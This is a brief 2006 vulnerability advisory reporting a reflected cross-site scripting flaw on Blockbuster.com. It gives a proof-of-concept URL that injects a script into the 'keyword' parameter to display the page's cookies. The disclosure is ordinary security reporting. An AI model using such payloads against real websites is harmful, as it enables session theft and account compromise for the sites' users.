Blockbuster XSS Vulnerability
=============================
Discovered By: Matthew Benenati <dk.mak0[AT]gmail[DOT]com>
Release Date: 2/20/2006
Severity: Medium

A cross-site scripting vulnerability exists on Blockbuster.com, a popular online DVD rental service.

Example:
http://www.blockbuster.com/corporate/displayAboutBlockbuster.action?keyword=%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E